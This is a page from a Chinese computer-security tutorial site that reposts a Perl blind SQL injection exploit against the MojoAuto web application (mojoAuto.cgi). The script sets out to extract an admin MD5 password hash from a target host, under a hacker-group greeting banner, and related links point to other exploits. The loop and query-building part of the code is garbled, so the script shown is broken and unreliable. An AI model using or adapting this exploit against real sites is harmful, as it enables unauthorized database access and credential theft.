手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoAuto Blind SQL Injection Exploit #n";

print " # (mojoAuto.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit】相关文章:

Maligno 一个开源的渗透测试工具

360安全卫士锁定主页图文步骤

WEB应用脆弱性防止策略 常见的16种WEB攻击以及解决方案

在局域网上把自己隐藏起来

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

电脑安全模式是什么

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

adsafe不能拦截广告怎么办?

精品推荐
分类导航